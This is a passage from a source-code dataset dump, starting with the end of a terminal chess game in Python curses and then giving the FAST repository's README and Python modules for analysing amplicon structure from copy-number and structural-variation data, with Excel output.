self.stdscr.attron(curses.color_pair(1))\n\n if pb[i // row][j // col] == empty:\n self.stdscr.addstr(texture[cb[i // row][j // col]])\n else:\n self.stdscr.addstr(ap[cb[i // row][j // col]]\\\n [pb[i // row][j // col]][i % row][j % col])\n\n self.stdscr.attroff(curses.color_pair(1))\n self.stdscr.attroff(curses.color_pair(2))\n self.stdscr.attroff(curses.color_pair(3))\n # print(\":\")\n self.stdscr.addstr(':\\n')\n\n for _ in range(col * square + 2):\n self.stdscr.addstr(':')\n self.stdscr.addstr('\\n')\n\n\nclass Interface(Display):\n\n def __init__(self, stdscr):\n super().__init__(stdscr)\n self.key_right = ord('l')\n self.key_left = ord('h')\n self.key_up = ord('k')\n self.key_down = ord('j')\n self.key_toggle_select = ord(' ')\n\n def on_key_press(self, key):\n if key == self.key_right:\n self.move_curs_right()\n elif key == self.key_left:\n self.move_curs_left()\n elif key == self.key_down:\n self.move_curs_down()\n elif key == self.key_up:\n self.move_curs_up()\n elif key == self.key_toggle_select:\n self.move_piece()\n self.toggle_select_piece()\n pass\n\n def play(self):\n quit = False\n while not quit:\n self.stdscr.clear()\n self.draw_board()\n key = self.stdscr.getch()\n self.on_key_press(key)\n if key == ord('q'):\n quit = True\n\ndef main():\n c = Control()\n c.turn = c.BLACK\n c.curs_loc = (1, 1)\n print(c.get_valid_move())\n pass\n\nif __name__ == 
'__main__':\n main()\n" }, { "alpha_fraction": 0.6257309913635254, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 20.3125, "blob_id": "6a004060356d615e9ea2a158912d1d28e457088d", "content_id": "18eaf3b6babc737bb0f262529737df67fc351c0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 38, "num_lines": 16, "path": "/main.py", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport curses\nfrom classes import Display, Interface\n\ndef main(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n maxy, maxx = stdscr.getmaxyx()\n # Display(stdscr).draw_board()\n # stdscr.getch()\n Interface(stdscr).play()\n pass\n\nif __name__ == '__main__':\n # main()\n curses.wrapper(main)\n\n" } ]
4
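The get_rook_moves and get_bishop_moves methods in the chess_curses classes.py above both walk direction vectors from a square until they leave the board or hit a piece. A compact standalone sketch of that ray-casting pattern; it is not code from the repo, and the names slide_moves, board, is_ally, and is_enemy are illustrative assumptions (an 8x8 list-of-lists board is assumed):

SQR = 8

def slide_moves(board, pos, directions, is_ally, is_enemy):
    # walk each direction vector until leaving the board or meeting an ally
    moves = []
    for dr, dc in directions:
        r, c = pos[0] + dr, pos[1] + dc
        while 0 <= r < SQR and 0 <= c < SQR and not is_ally(board[r][c]):
            moves.append((r, c))
            if is_enemy(board[r][c]):
                break  # an enemy can be captured, but cannot be slid past
            r, c = r + dr, c + dc
    return moves

# rook rays are the four straight directions, bishop rays the four diagonals
ROOK_DIRS = [(0, -1), (0, 1), (1, 0), (-1, 0)]
BISHOP_DIRS = [(1, 1), (1, -1), (-1, 1), (-1, -1)]
# a queen simply combines both ray sets, which is exactly how
# get_valid_move_aux composes get_rook_moves and get_bishop_moves above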
zick-lab/FAST
https://github.com/zick-lab/FAST
4a20b5eee77b0d8eae2c042950eb481393e48680
0819f9c2def861b094daf62e2b5aff0b5117e3fb
629570b91fe19abee427464ab4db542273d3485f
refs/heads/master
2022-03-20T10:00:04.051793
2022-03-06T13:38:26
2022-03-06T13:38:26
152,279,683
0
1
null
2018-10-09T15:55:22
2018-12-03T15:02:26
2019-01-03T07:20:42
Python
[ { "alpha_fraction": 0.7391533255577087, "alphanum_fraction": 0.7570339441299438, "avg_line_length": 38.20618438720703, "blob_id": "4b904d4fe3ebbd55fed5d055f00de388f6222fef", "content_id": "a158c1f9c743508d84cc5c8809d2e19497a6019a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3805, "license_type": "no_license", "max_line_length": 241, "num_lines": 97, "path": "/README.md", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "# FAST - FindAmpliconSTructure\n\nFAST is a tool for analyzing the structure and characteristics of amplicons, based on Copy Number Variations and Structural Variations data.\n\n## Citing FAST\nIf you are using FAST in your research, please cite our paper as follows:\n\nClinical Implications of Sub-grouping HER2 Positive Tumors by Amplicon Structure and Co-amplified Genes. Maoz, M., Devir, M., Inbar, M. et al. Scientific Reports, 9, 18795 (2019). https://rdcu.be/b3X1q\n\n\n## Prerequisites\nPython 2.7.x\n<br>\nPackages:\n<br>\n- numpy >= 1.8.2\n- pandas == 0.17.0<br>\n- xlsxwriter >= 0.6.6<br>\n- xlwt >= 0.7.5<br>\n- xlrd<br>\n\n## Usage\n`python Fast.py [-h] --config CONFIG [--excel] [--remove_cent]`\n<br>\nParameters:\n- --help, -h\t\t\t\tshow this help message and exit\n-\t--config CONFIG, -c CONFIG\tConfiguration file\n-\t--excel, -e \t\t\tgenerated colored excel file\n-\t--remove_unmappble, -r \tremove unmappable areas, specifically centromeres and telomeres data\n<br>\nsee example below in \"Running FAST on test data\" section\n\n## Inputs\n### Input files\nFAST requires the following input data:\n1. Structural Variations (SVs) in the genome of the analyzed sample, as generated by BreakDancerMax.\n2. Copy Number Variations (CNVs) in the genome of the analyzed sample, as generated by Control-FREEC.\n\nThe current version of FAST relies on the file formats of these tools. Thus, it is recommended to use these tools for generating inputs to FAST. However, other tools can be used as well as long as the file format is kept.\n\n### Configuration File\nThe configuration file consists of two groups; the first is [PARAMS], in which certain parameters and constants are set. The user may use the default values, or update them. The second group is [FILES], in which the input files are supplied.\n\n#### Configuration File [PARAMS] parameters:\n-\tWINDOW = 15000\nWindow size used for digitization.\n-\tWINDOW_MULT = 3\nThe tool calculates threshold as WINDOW_MULT * WINDOW, and uses it for classifying the breakpoints to the corresponding segments.\n-\tCNV_MINIMAL_CN = 6\nMinimal copy number value for considering an area as amplified.\n-\tSV_MINIMAL_SCORE = 90\nBreakpoints with a lower score will be removed from the analysis.\n-\tSV_MINIMAL_NUM_READS = 2\nBreakpoints with a lower number of supporting reads will be removed from the analysis.\n-\tSV_MINIMAL_DELETIONS_REMOVE = 1000\nDeletions which are shorter than this value will be removed from the analysis.\n\n#### Configuration File [FILES] parameters:\n-\tUNMAPPBLE_INP\nA comma delimited file which contains centromeres and telomeres info. Assumed to contain the following fields:\nchr\nchromStart\nchromEnd\ntype (centromere / telomere)\n-\tSAMPLE_ID\n-\tFAST_OUTPUT_DIR\n-\tCNV_INP\nCopy Number Variations (CNVs) file, generated by Control-FREEC\n-\tSV_INP\nStructural Variations (SVs) file, generated by BreakDancerMax.\n\n## Output\nFAST output is stored in the configured output directory (FAST_OUTPUT_DIR). 
\n\nThe tool outputs the following files:\n-\t<SAMPLE_ID>_cnv_FAST.csv\n<br>CNV file after Fast processing\n-\t<SAMPLE_ID>_sv_FAST.csv\n<br>SV file after Fast processing\n-\t<SAMPLE_ID>_amplicons_FAST.csv\n<br>Amplicon Analysis\n-\t<SAMPLE_ID>_segments_FAST.csv\n<br>Segment Analysis\n-\t<SAMPLE_ID>_focused_genes_FAST.csv\n<br>Analysis of the focused gene loci\n-\t<SAMPLE_ID>_FAST.xlsx\n<br>File summarizing the data of all above files. In this file colors are assigned to cells, such that each amplicon has its own color. This makes it easier for the human eye to see the relations between the different records.\n\n## Running FAST on test data\nTest data of HCC1954 is supplied under `example/data/HCC1954`\n<br>\nMake sure to create `FAST_OUTPUT_DIR` as configured in `example/data/HCC1954/HCC1954_config.txt`\n<br>\nRun by: `python Fast.py -c example/data/HCC1954/HCC1954_config.txt -e -r`\n\n## Author\nMichal Devir\n" }, { "alpha_fraction": 0.5126163363456726, "alphanum_fraction": 0.5230458378791809, "avg_line_length": 33.81124496459961, "blob_id": "51b3f1d178bab1e693f1a791bfad6bc6b5da4dfb", "content_id": "3e4b30fbd678fc2ed0538df6901809523710cff6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8917, "license_type": "no_license", "max_line_length": 111, "num_lines": 249, "path": "/excelUtils.py", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "import os\r\nimport xlsxwriter\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nCOLORS = [('yellow','black'),\r\n          ('blue', 'white'),\r\n          ('brown','white'),\r\n          ('cyan', 'black'),\r\n          ('gray','black'),\r\n          ('green','black'),\r\n          ('lime', 'black'),\r\n          ('orange','black'),\r\n          ('pink','black'),\r\n          ('purple','black'),\r\n          ('red','black'),\r\n          ('silver','black'),\r\n          ('navy','white'),\r\n          ('black','white')]\r\n\r\n\r\n\r\ndef setFormats(workbook):\r\n    formats = {}\r\n\r\n    title_frmt = workbook.add_format()\r\n    title_frmt.set_bold()\r\n    title_frmt.set_font_size(16)\r\n    title_frmt.set_underline()\r\n    formats['title'] = title_frmt\r\n\r\n    header = workbook.add_format()\r\n    header.set_bold()\r\n    formats['header'] = header\r\n\r\n    colored = []\r\n    bordered = []\r\n    for c in COLORS:\r\n        frmt = workbook.add_format()\r\n        frmt.set_pattern(1)\r\n        frmt.set_bg_color(c[0])\r\n        frmt.set_font_color(c[1])\r\n        colored.append(frmt)\r\n\r\n        frmt = workbook.add_format()\r\n        frmt.set_pattern(1)\r\n        frmt.set_bg_color(c[0])\r\n        frmt.set_font_color(c[1])\r\n        frmt.set_border(3)\r\n        frmt.set_pattern(15)\r\n        frmt.set_bold()\r\n        bordered.append(frmt)\r\n\r\n    formats['colored'] = colored\r\n    formats['bordered'] = bordered\r\n    return formats\r\n\r\ndef writeHeader(title, l,worksheet, OFFSET, formats, comments=None):\r\n    worksheet.write(OFFSET, 0, title, formats['title'])\r\n    OFFSET += 1\r\n    if comments:\r\n        for comment in comments:\r\n            print comment\r\n            worksheet.write(OFFSET, 0, comment + '\\n')\r\n            OFFSET+=1\r\n    if len(l)==0:\r\n        worksheet.write(OFFSET, 0, 'No data for this table', formats['header'])\r\n    for i,item in enumerate(l):\r\n        if str(item)=='nan':\r\n            worksheet.write_blank(OFFSET,i,None)\r\n        else:\r\n            worksheet.write(OFFSET, i, l[i], formats['header'])\r\n    OFFSET += 1\r\n    return OFFSET\r\n\r\ndef writeEmptyHeader(title, message, worksheet, OFFSET, formats):\r\n    worksheet.write(OFFSET, 0, title, formats['title'])\r\n    OFFSET += 1\r\n    worksheet.write(OFFSET, 0, message)\r\n    OFFSET += 1\r\n    return OFFSET\r\n\r\ndef writeEmptyRows(worksheet, OFFSET, n):\r\n    for i in range(n):\r\n        
worksheet.write_blank(OFFSET+i,0,None)\r\n OFFSET += (i+1)\r\n return OFFSET\r\n\r\ndef setColors(l):\r\n return dict(zip(l,range(len(l)))), len(l)\r\n\r\ndef write_simple_table(worksheet, name, df, OFFSET,formats, index=False, comments=None):\r\n if df is not None and len(df)>0:\r\n cols = list(df.columns.values)\r\n cols_header = [df.index.name]+cols if index else cols\r\n else:\r\n cols = []\r\n cols_header = []\r\n OFFSET = writeHeader(name, cols_header, worksheet, OFFSET, formats,comments)\r\n if df is not None:\r\n iir = 0\r\n for ir, row in df.iterrows():\r\n if index:\r\n worksheet.write(OFFSET+iir, 0, ir)\r\n index_offset = 1\r\n else:\r\n index_offset = 0\r\n for ic in range(len(cols)):\r\n if not pd.isnull(row[ic]):\r\n worksheet.write(OFFSET+iir, ic+index_offset, row[ic])\r\n else:\r\n worksheet.write_blank(OFFSET+iir,ic+index_offset,None)\r\n iir+=1\r\n OFFSET += iir\r\n OFFSET = writeEmptyRows(worksheet, OFFSET, 3)\r\n return OFFSET\r\n\r\n\r\ndef write_excel(fast_output_dir, sample_id, dfcnv, dfsv, dfamplicons, dfsegments, df_focused_genes):\r\n outputFileXls = os.path.join(fast_output_dir, sample_id + '_FAST.xlsx')\r\n workbook = xlsxwriter.Workbook(outputFileXls)\r\n worksheet1 = workbook.add_worksheet('FAST')\r\n formats = setFormats(workbook)\r\n used_colors, ci = setColors(dfcnv['Segment ID'].unique())\r\n used_amplicons_colors , ci1= setColors(dfcnv['Amplicon ID'].unique())\r\n\r\n OFFSET = 0\r\n #\r\n # focused genes\r\n OFFSET = write_simple_table(worksheet1, 'Focused Genes', df_focused_genes, OFFSET, formats)\r\n\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n # write dfamplicons data\r\n cols = [] if dfamplicons is None else list(dfamplicons.columns.values)\r\n OFFSET = writeHeader('Amplicon Analysis ', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n if dfamplicons is not None:\r\n for ir, row in dfamplicons.iterrows():\r\n ## if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['bordered'][used_amplicons_colors[row['Amplicon ID']]%len(COLORS)]\r\n worksheet1.write(OFFSET+iir, 0, row['Amplicon ID'],frmt)\r\n for ic in range(1,len(cols)):\r\n if not pd.isnull(row[ic]):\r\n worksheet1.write(OFFSET+iir, ic, row[ic])\r\n else:\r\n worksheet1.write_blank(OFFSET+iir,ic,None)\r\n iir+=1\r\n\r\n OFFSET += iir\r\n\r\n # write empty rows\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n # write dfsegments data\r\n cols = [] if dfsegments is None else list(dfsegments.columns.values)\r\n OFFSET = writeHeader('Segment Analysis ', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n if dfsegments is not None:\r\n for ir, row in dfsegments.iterrows():\r\n ## if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['colored'][used_colors[row['Segment ID']] % len(COLORS)]\r\n worksheet1.write(OFFSET+iir, 0, row['Segment ID'],frmt)\r\n for ic in range(1,len(cols)):\r\n if not pd.isnull(row[ic]):\r\n worksheet1.write(OFFSET+iir, ic, row[ic])\r\n else:\r\n worksheet1.write_blank(OFFSET+iir,ic,None)\r\n iir+=1\r\n\r\n OFFSET += iir\r\n\r\n # write empty rows\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n\r\n # write CNV data with corresponding colors\r\n cols = [] if dfcnv is None else list(dfcnv.columns.values)\r\n OFFSET = writeHeader('CNV Data', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n if dfcnv is not None:\r\n for ir, row in dfcnv.iterrows():\r\n for ic, col in enumerate(dfcnv.columns):\r\n if col=='Segment ID':\r\n if np.isfinite(row['Segment ID']):\r\n frmt = formats['colored'][used_colors[row['Segment ID']] % len(COLORS)]\r\n else:\r\n 
frmt = None\r\n elif col=='Amplicon ID':\r\n if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['bordered'][used_amplicons_colors[row['Amplicon ID']] % len(COLORS)]\r\n else:\r\n frmt = None\r\n else:\r\n frmt = None\r\n\r\n if not pd.isnull(row[ic]):\r\n if frmt:\r\n worksheet1.write(OFFSET+iir, ic, row[ic],frmt)\r\n else:\r\n worksheet1.write(OFFSET + iir, ic, row[ic])\r\n else:\r\n worksheet1.write_blank(OFFSET+iir,ic,None)\r\n iir+=1\r\n OFFSET += iir\r\n\r\n\r\n # write empty rows\r\n OFFSET = writeEmptyRows(worksheet1, OFFSET, 3)\r\n\r\n # write SV Data\r\n cols = [] if dfsv is None else list(dfsv.columns.values)\r\n OFFSET = writeHeader('SV Data', cols, worksheet1, OFFSET, formats)\r\n iir = 0\r\n\r\n # write dfsv\r\n if dfsv is not None:\r\n for ir, row in dfsv.iterrows():\r\n if pd.isnull(row['Segment1 ID']) and pd.isnull(row['Segment2 ID']):\r\n continue\r\n frmt_list = [None, None]\r\n for i in range(2):\r\n if not pd.isnull(row['Segment%d ID' % (i+1)]):\r\n frmt_list[i] = formats['colored'][used_colors[row['Segment%d ID'%(i+1)]]%len(COLORS)]\r\n\r\n for ic, col in enumerate(dfsv.columns):\r\n # one of the following columns: Chr1/2\tPos1/2\tOrientation1/2 segment1/2 edge1/2\r\n if col.find('1') > 0:\r\n frmt = frmt_list[0]\r\n elif col.find('2') > 0:\r\n frmt = frmt_list[1]\r\n else:\r\n if col=='Amplicon ID':\r\n if np.isfinite(row['Amplicon ID']):\r\n frmt = formats['bordered'][used_amplicons_colors[row['Amplicon ID']] % len(COLORS)]\r\n worksheet1.write(OFFSET + iir, ic, row['Amplicon ID'], frmt)\r\n continue\r\n else: frmt = None\r\n\r\n if not pd.isnull(row[col]):\r\n if frmt is None:\r\n worksheet1.write(OFFSET + iir, ic, row[col])\r\n else:\r\n worksheet1.write(OFFSET + iir, ic, row[col], frmt)\r\n else:\r\n worksheet1.write_blank(OFFSET + iir, ic, None)\r\n iir+=1\r\n\r\n workbook.close()\r\n" }, { "alpha_fraction": 0.6127102971076965, "alphanum_fraction": 0.617196261882782, "avg_line_length": 36.739131927490234, "blob_id": "c83f9d870b216ced1e1c171fec825fdf7da1250b", "content_id": "92bcc782bf20c4f2f7a6940d713714f65ea050b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2675, "license_type": "no_license", "max_line_length": 120, "num_lines": 69, "path": "/focusedGenesProcessing.py", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "import argparse\r\nimport ConfigParser\r\n\r\nfrom excelUtils import *\r\n\r\nclass FL:\r\n def __init__(self,name, chrm, start,end):\r\n self.name = name\r\n self.chrm = chrm\r\n self.start = int(start)\r\n self.end = int(end)\r\n\r\n\r\ndef analyzeFileFocusedLocuses(dfcnv, dfamplicon, dfsegment, focused_genes):\r\n '''\r\n Analyze whether and which segments contain specific genes\r\n :param sample_id: sample ID\r\n :param dfcnv: dataframe of cnvs\r\n :param dfsegment: dataframe of segments\r\n :param dfamplicon: dataframe of amplicons\r\n :param focused_genes: list of focused genes\r\n :return:\r\n '''\r\n\r\n l_res = []\r\n\r\n for gene in focused_genes:\r\n dfcnv_gene = dfcnv[(dfcnv.chr==gene.chrm) & (dfcnv.start <= gene.end) & (dfcnv.end >= gene.start)]\r\n if len(dfcnv_gene)>0:\r\n copy_number = dfcnv_gene.iloc[0].CopyNumber\r\n amplicon = dfcnv_gene.iloc[0]['Amplicon ID']\r\n segment = dfcnv_gene.iloc[0]['Segment ID']\r\n if len(dfamplicon)==0:\r\n amplicon_struct_type = None\r\n else:\r\n amplicon_struct_type = dfamplicon[dfamplicon['Amplicon ID']==amplicon].iloc[0].Winner_Amplicon_Structure\r\n if len(dfsegment)==0:\r\n segment_struct_type = None\r\n 
else:\r\n                df_seg = dfsegment[dfsegment['Segment ID']==segment]\r\n                if len(df_seg)>0:\r\n                    segment_struct_type = df_seg.iloc[0].Winner_Segment_Structure\r\n                else:\r\n                    segment_struct_type = None\r\n\r\n            l_res.append([gene.name, copy_number, amplicon, amplicon_struct_type, segment, segment_struct_type])\r\n    if len(l_res)==0:\r\n        print 'No focused genes found in amplified segments'\r\n    return l_res\r\n\r\ndef segments2FocusedGenes(dfcnv, dfamplicon, dfsegment, focused_locuses):\r\n    '''\r\n    :param dfcnv: dataframe of cnvs\r\n    :param dfamplicon: dataframe of amplicons\r\n    :param dfsegment: dataframe of segments\r\n    :param focused_locuses: list of focused genes\r\n    :return: dataframe of the focused-gene analysis\r\n    '''\r\n\r\n    l_focusedGenes = analyzeFileFocusedLocuses(dfcnv, dfamplicon, dfsegment, focused_locuses)\r\n\r\n    focused_genes_cols = ['Gene', 'copy_number', 'Amplicon ID', 'Amplicon Structure', 'Segment ID', 'Segment Structure']\r\n    if len(l_focusedGenes)==0:\r\n        df_focused_genes_analysis = pd.DataFrame(columns=focused_genes_cols, data=[[None]*len(focused_genes_cols)])\r\n    else:\r\n        df_focused_genes_analysis = pd.DataFrame(l_focusedGenes, columns=focused_genes_cols)\r\n        df_focused_genes_analysis.sort_values(by='Amplicon Structure',ascending=True, inplace=True, na_position='last')\r\n\r\n    return df_focused_genes_analysis\r\n\r\n" }, { "alpha_fraction": 0.5877243280410767, "alphanum_fraction": 0.5945267081260681, "avg_line_length": 40.18763732910156, "blob_id": "ea3c08d034385c181f310d4e31b7b5feadb3338c", "content_id": "2571d992a150b8bf656e73ec2fe75a22264caa95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19111, "license_type": "no_license", "max_line_length": 206, "num_lines": 453, "path": "/Fast.py", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "'''\r\nFast is a tool for analyzing the structure and the characteristics of segments, based on CNVs and SVs\r\n'''\r\n\r\n__version__ = \"$Revision: 4 $\"\r\n# $Source$\r\n\r\nimport ConfigParser\r\nimport argparse\r\nimport csv\r\nimport datetime\r\nimport os\r\nimport re\r\nimport shutil\r\nimport time\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom collections import OrderedDict\r\n\r\n\r\nfrom focusedGenesProcessing import FL, segments2FocusedGenes\r\nfrom excelUtils import write_excel\r\n\r\n\r\nmut_types = ['ID', 'TR', 'DM', 'Other']\r\n\r\nCP = ConfigParser.ConfigParser()\r\n\r\ndef readCNVData(cnvFile, remove_unmappble, unify_seg = True):\r\n    '''\r\n    read the CNV file, clean and filter it\r\n    :param cnvFile: CNV file\r\n    :param remove_unmappble: flag to indicate whether to remove unmappable areas\r\n    :param unify_seg: flag to indicate whether to unify consecutive segments\r\n    :return: cleaned, filtered CNV dataframe\r\n    '''\r\n\r\n    print 'readCNVData'\r\n    dfcnv = pd.read_csv(cnvFile, prefix='CNV', header=None, names=['chr','start','end', 'CopyNumber', 'VariationType'],sep=None)\r\n    dfcnv['start'] = dfcnv['start'].astype('int32')\r\n    dfcnv['end'] = dfcnv['end'].astype('int32')\r\n    dfcnv['chr'] = dfcnv['chr'].astype('str')\r\n    dfcnv = dfcnv[dfcnv['chr'].apply(lambda x: re.match('[^0-9xy]',x) is None)]\r\n\r\n    # filtering\r\n\r\n    # keep only the gains\r\n    dfcnv = dfcnv[dfcnv['VariationType']=='gain']\r\n    # keep only gains above the configured threshold\r\n    dfcnv = dfcnv[dfcnv['CopyNumber']>=CP.getint('PARAMS','CNV_MINIMAL_CN')]\r\n\r\n    # unify consecutive segments\r\n    if unify_seg:\r\n        dfcnv['prev_chr'] = dfcnv.chr.shift()\r\n        dfcnv['prev_end'] = dfcnv.end.shift()\r\n        dfcnv['not_same_segment'] = ~((dfcnv.prev_chr==dfcnv.chr) & (dfcnv.start == dfcnv.prev_end))\r\n        dfcnv.ix[0,'not_same_segment'] = True\r\n        dfcnv['Segment ID'] = 
np.cumsum(dfcnv.not_same_segment)\r\n dfcnv['Segment ID'] = dfcnv['Segment ID'].astype('int32')\r\n dfcnv = dfcnv[:len(dfcnv)-1]\r\n grouped = dfcnv.groupby('Segment ID', as_index=False)\r\n dfcnv = grouped.agg(OrderedDict((('chr','first'),\r\n ('start','first'),\r\n ('end','last'),\r\n ('CopyNumber', lambda x: int(np.mean(x))),\r\n ('VariationType','first'))))\r\n dfcnv['start'] = dfcnv['start'].astype('int32')\r\n dfcnv['end'] = dfcnv['end'].astype('int32')\r\n\r\n dfcnv['segment_size']=dfcnv['end']-dfcnv['start']\r\n dfcnv['Segment ID'] = np.array(range(len(dfcnv)))\r\n\r\n # remove unmappble areas\r\n if remove_unmappble:\r\n dfcnv = removeUnmap(dfcnv)\r\n\r\n dfcnv.sort_values(by='Segment ID', ascending=True, inplace=True, na_position='last')\r\n\r\n return dfcnv\r\n\r\n\r\ndef removeUnmap(dfcnv):\r\n '''\r\n util function, to remove unmappble areas from cnv dataframe\r\n :param dfcnv:\r\n :return: dfcnv, after removing unmappble areas\r\n '''\r\n THRESHOLD = CP.getint('PARAMS','WINDOW')*CP.getint('PARAMS','WINDOW_MULT')\r\n\r\n dfunmap = pd.read_csv(CP.get('FILES','UNMAPPBLE_INP'))\r\n dfunmap['chr'] = dfunmap['chr'].apply(lambda x: x.replace('chr',''))\r\n dftemp = pd.merge(dfcnv,dfunmap,how='left',on='chr', sort = False)\r\n dftemp['isUnmap'] = (dftemp['start'] <= (dftemp['chromEnd']+THRESHOLD)) & (dftemp['end'] >= (dftemp['chromStart']-THRESHOLD))\r\n dftemp=dftemp[dftemp['isUnmap']==True]\r\n dfcnv = pd.merge(dfcnv,dftemp[['chr','start','end','isUnmap']],how='left',on=['chr','start','end'],sort=True)\r\n dfcnv = dfcnv[pd.isnull(dfcnv['isUnmap'])]\r\n del dfcnv['isUnmap']\r\n return dfcnv\r\n\r\n\r\ndef readSVData(svFile):\r\n '''\r\n Read the SV file, perform some filtering and return a dataframe\r\n :param svFile: sv file\r\n :return: cleared, filtered sv dataframe\r\n '''\r\n print 'readSVData'\r\n\r\n col_names = ['Chr1', 'Pos1', 'Orientation1', 'Chr2', 'Pos2', 'Orientation2', 'Type', 'Size', 'Score', 'num_Reads']\r\n dfsv = pd.read_csv(svFile, sep='\\t', comment='#', header=None, usecols=range(len(col_names)), names=col_names)\r\n\r\n print 'dfsv read'\r\n\r\n # filtering records records\r\n dfsv = dfsv[dfsv['Score']>CP.getint('PARAMS','SV_MINIMAL_SCORE')]\r\n dfsv = dfsv[dfsv['num_Reads']>CP.getint('PARAMS','SV_MINIMAL_NUM_READS')]\r\n\r\n dfsv['Chr1'] = dfsv['Chr1'].astype('str')\r\n dfsv['Chr2'] = dfsv['Chr2'].astype('str')\r\n dfsv['Chr1'] = dfsv['Chr1'].apply(lambda x: x.replace('chr',''))\r\n dfsv['Chr2'] = dfsv['Chr2'].apply(lambda x: x.replace('chr',''))\r\n dfsv = dfsv[(dfsv['Chr1'].apply(lambda x: re.match('[^0-9xy]',x) is None)) & (dfsv['Chr2'].apply(lambda x: re.match('[^0-9xy]',x) is None))]\r\n\r\n # remove small deletions\r\n dfsv = dfsv[~(((dfsv['Type']=='DEL') | (dfsv['Type']=='ITX')) & (dfsv['Chr1']==dfsv['Chr2']) & (abs(dfsv['Pos2']-dfsv['Pos1'])<CP.getint('PARAMS','SV_MINIMAL_DELETIONS_REMOVE')))]\r\n\r\n # digitize\r\n win = CP.getint('PARAMS','WINDOW')\r\n dfsv['Pos1'] = dfsv['Pos1'].apply(lambda x: (x//win)*win)\r\n dfsv['Pos2'] = dfsv['Pos2'].apply(lambda x: (x//win)*win)\r\n\r\n # and one additional filtering\r\n dfsv=unifySvRecords(dfsv)\r\n return dfsv\r\n\r\n\r\ndef unifySvRecords (dfsv):\r\n '''\r\n unify close enough svs\r\n :param dfsv\r\n :return: dfsv with unified closed svs\r\n '''\r\n dfsv.sort_values(by=['Chr1','Pos1','Chr2','Pos2'],ascending=[True]*4,inplace=True)\r\n dfsv['unify'] = np.nan\r\n counter = 0\r\n row_it = dfsv.iterrows()\r\n i, last = row_it.next()\r\n dfsv.loc[i,'unify'] = counter\r\n\r\n for i, row in row_it:\r\n if not 
(row['Chr1']==last['Chr1'] and row['Chr2']==last['Chr2'] and (abs(row['Pos1']-last['Pos1']))<1000 and (abs(row['Pos2']-last['Pos2']))<1000 and row['Type']==last['Type']):\r\n counter += 1\r\n dfsv.loc[i,'unify'] = counter\r\n last = row\r\n\r\n grouped = dfsv.groupby('unify', as_index=False)\r\n dfsv = grouped.agg(OrderedDict((('Chr1','first'),\r\n ('Pos1', lambda x: int(np.mean(x))),\r\n ('Orientation1', 'first'),\r\n ('Chr2', 'first'),\r\n ('Pos2', lambda x: int(np.mean(x))),\r\n ('Orientation2', 'first'),\r\n ('Type', 'first'),\r\n ('Size', 'sum'),\r\n ('Score', lambda x: int(np.mean(x))),\r\n ('num_Reads', 'sum'),\r\n )))\r\n del dfsv['unify']\r\n return dfsv\r\n\r\n\r\ndef assignSegmentsForSVs (dfcnv, dfsv):\r\n '''\r\n Assign segments to each <chr,location> in breakpoint\r\n :param dfcnv: df of cnv\r\n :param dfsv: df of sv\r\n :return: dfsv with segment for each <chr,location> in breakpoint\r\n '''\r\n THRESHOLD = CP.getint('PARAMS','WINDOW')*CP.getint('PARAMS','WINDOW_MULT')\r\n\r\n for j in [1, 2]:\r\n dfsv['Segment%d ID' % j] = None\r\n dfsv['edge%d' % j] = None\r\n\r\n grouped_segments = dfcnv.groupby('chr')\r\n\r\n for i, row in dfsv.iterrows():\r\n for j in [1,2]:\r\n if row['Chr%d' % j] in grouped_segments.groups:\r\n segments_in_chr = grouped_segments.get_group(row['Chr%d' % j])\r\n for seg_row, seg_record in segments_in_chr.iterrows():\r\n if (seg_record['start']-THRESHOLD) <= row['Pos%d' % j] <= (seg_record['end'] + THRESHOLD):\r\n dfsv.loc[i, 'Segment%d ID' % j] = seg_record['Segment ID']\r\n if seg_record['start'] + THRESHOLD > row['Pos%d' % j]:\r\n dfsv.loc[i, 'edge%d' % j] = 'left'\r\n elif seg_record['end'] - THRESHOLD < row['Pos%d' % j]:\r\n dfsv.loc[i, 'edge%d' % j] = 'right'\r\n else:\r\n dfsv.loc[i, 'edge%d' % j] = 'middle'\r\n break\r\n\r\n return dfsv\r\n\r\n\r\ndef createAmpliconFromConnectedSegments(max_segment, dfsv, dfcnv):\r\n '''\r\n identify connected segments (= amplicons) based on breakpoints, and assign them an Amplicon ID\r\n :param max_segment: maximal number of segments\r\n :param dfsv: df of sv\r\n :param dfsegments: df of segments\r\n :return: dfsegments, dfamplicons\r\n '''\r\n\r\n def dfs(a, visited, u, val):\r\n \"\"\" DFS for finding connected segments\"\"\"\r\n for v, temp in enumerate(a[u]):\r\n if a[u][v] == 0:\r\n continue\r\n if visited.has_key(v) == False:\r\n visited[v] = val\r\n dfs(a, visited, v, val)\r\n\r\n relevant_dfsv = dfsv.dropna(subset=['Segment1 ID','Segment2 ID'])\r\n\r\n a = np.zeros((max_segment+1, max_segment+1))\r\n for i, row in relevant_dfsv.iterrows():\r\n a[row['Segment1 ID']][row['Segment2 ID']] = 1\r\n a[row['Segment2 ID']][row['Segment1 ID']] = 1\r\n\r\n con_comp = 0\r\n visited = {}\r\n for u 